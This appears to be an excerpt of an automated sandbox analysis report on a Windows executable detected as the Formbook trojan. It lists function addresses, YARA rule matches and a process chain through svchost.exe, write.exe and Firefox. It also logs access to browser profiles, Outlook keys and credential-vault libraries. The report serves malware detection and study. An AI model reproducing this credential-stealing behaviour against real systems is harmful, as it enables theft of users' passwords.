Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D812ED	5_2_04D812ED
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE52A0	5_2_04CE52A0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D2739A	5_2_04D2739A
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CCD34C	5_2_04CCD34C
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9132D	5_2_04D9132D
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9FCF2	5_2_04D9FCF2
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D59C32	5_2_04D59C32
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CFFDC0	5_2_04CFFDC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D91D5A	5_2_04D91D5A
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE3D40	5_2_04CE3D40
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D97D73	5_2_04D97D73
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE9EB0	5_2_04CE9EB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA3FD2	5_2_04CA3FD2
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA3FD5	5_2_04CA3FD5
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE1F92	5_2_04CE1F92
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9FFB1	5_2_04D9FFB1
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9FF09	5_2_04D9FF09
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE38E0	5_2_04CE38E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D4D800	5_2_04D4D800
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE9950	5_2_04CE9950
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CFB950	5_2_04CFB950
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D75910	5_2_04D75910
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D8DAC6	5_2_04D8DAC6
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D25AA0	5_2_04D25AA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D7DAAC	5_2_04D7DAAC
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D81AA3	5_2_04D81AA3
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9FA49	5_2_04D9FA49
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D97A46	5_2_04D97A46
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D53A6C	5_2_04D53A6C
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D55BF0	5_2_04D55BF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D1DBF9	5_2_04D1DBF9
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CFFB80	5_2_04CFFB80
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9FB76	5_2_04D9FB76
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B01800	5_2_02B01800
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B1A070	5_2_02B1A070
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AFCA40	5_2_02AFCA40
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AFACE0	5_2_02AFACE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AFCC60	5_2_02AFCC60
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B03330	5_2_02B03330
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AF11A1	5_2_02AF11A1
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A6A2C3	5_2_04A6A2C3
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A6AFE8	5_2_04A6AFE8
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A6BF7C	5_2_04A6BF7C
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A6BAC5	5_2_04A6BAC5
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A6BBE6	5_2_04A6BBE6

Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04D4EA12 appears 86 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04D15130 appears 58 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04CCB970 appears 280 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04D27E54 appears 111 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04D5F290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 111 times
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: String function: 006A9CB3 appears 31 times
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: String function: 006BF9F2 appears 40 times
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: String function: 006C0A30 appears 46 times

Source: pismo1A 12.06.2024.exe, 00000000.00000003.2031750743.0000000003CED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs pismo1A 12.06.2024.exe
Source: pismo1A 12.06.2024.exe, 00000000.00000003.2031214416.0000000003AF3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs pismo1A 12.06.2024.exe

Source: pismo1A 12.06.2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/14

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_007137B5 GetLastError,FormatMessageW,

0_2_007137B5

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_007010BF AdjustTokenPrivileges,CloseHandle,		0_2_007010BF
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_007016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_007016C3

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_007151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007151CD

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0072A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0072A67C

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0071648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0071648E

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_006A42A2

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

File created: C:\Users\user\AppData\Local\Temp\autAD5B.tmp

Jump to behavior

Source: pismo1A 12.06.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: write.exe, 00000005.00000002.4488869608.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000003.2479714757.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000003.2481216448.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000003.2479714757.0000000002FAE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4488869608.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: pismo1A 12.06.2024.exe	ReversingLabs: Detection: 60%
Source: pismo1A 12.06.2024.exe	Virustotal: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\pismo1A 12.06.2024.exe "C:\Users\user\Desktop\pismo1A 12.06.2024.exe"
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\pismo1A 12.06.2024.exe"
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\pismo1A 12.06.2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\write.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\write.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: pismo1A 12.06.2024.exe

Static file information: File size 1257472 > 1048576

Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pismo1A 12.06.2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: pismo1A 12.06.2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: write.pdbGCTL source: svchost.exe, 00000002.00000002.2305240769.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305256694.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000002.4489621674.00000000010C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: write.pdb source: svchost.exe, 00000002.00000002.2305240769.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305256694.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000002.4489621674.00000000010C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IwDtIjtyhRCIk.exe, 00000004.00000000.2231888284.000000000008E000.00000002.00000001.01000000.00000005.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4488416434.000000000008E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: pismo1A 12.06.2024.exe, 00000000.00000003.2030768890.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, pismo1A 12.06.2024.exe, 00000000.00000003.2032082942.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219833592.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2218454465.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000003.2306935386.0000000004AEE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000003.2305313641.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: pismo1A 12.06.2024.exe, 00000000.00000003.2030768890.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, pismo1A 12.06.2024.exe, 00000000.00000003.2032082942.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2305485059.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219833592.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2218454465.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, write.exe, write.exe, 00000005.00000003.2306935386.0000000004AEE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000003.2305313641.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: write.exe, 00000005.00000002.4488869608.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491856252.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000000.2371030466.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2585008330.000000000193C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: write.exe, 00000005.00000002.4488869608.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491856252.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000000.2371030466.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2585008330.000000000193C000.00000004.80000000.00040000.00000000.sdmp

Source: pismo1A 12.06.2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pismo1A 12.06.2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pismo1A 12.06.2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pismo1A 12.06.2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pismo1A 12.06.2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A42DE

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006AA40E push 00000000h; retf	0_2_006AA444
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C0A76 push ecx; ret	0_2_006C0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403350 push eax; ret	2_2_00403352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CCB push 0000006Bh; iretd	2_2_00401D84
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CD0 push 0000006Bh; iretd	2_2_00401D84
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040C4B4 push cs; retf 002Ah	2_2_0040C4B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040851A push cs; retf	2_2_0040851D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040853C push 00000009h; retf	2_2_0040853E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413623 pushad ; ret	2_2_0041364E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417F3D pushfd ; retf	2_2_00417F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330225F pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033027FA pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx	2_2_033309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330283D push eax; iretd	2_2_03302858
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA27FA pushad ; ret	5_2_04CA27F9
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA225F pushad ; ret	5_2_04CA27F9
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA283D push eax; iretd	5_2_04CA2858
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CD09AD push ecx; mov dword ptr [esp], ecx	5_2_04CD09B6
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA1200 push edx; retf 0004h	5_2_04CA1206
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA18A7 push ds; retf	5_2_04CA198E
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA19DB push 262804DCh; retf	5_2_04CA19EA
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CA1BC7 push eax; retf	5_2_04CA1BBE
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B002D0 pushad ; ret	5_2_02B002FB
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B001D0 pushad ; ret	5_2_02B002FB
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B04BEA pushfd ; retf	5_2_02B04BEC
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B0ADEC push edx; iretd	5_2_02B0ADF4
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B0D330 push edx; ret	5_2_02B0D404
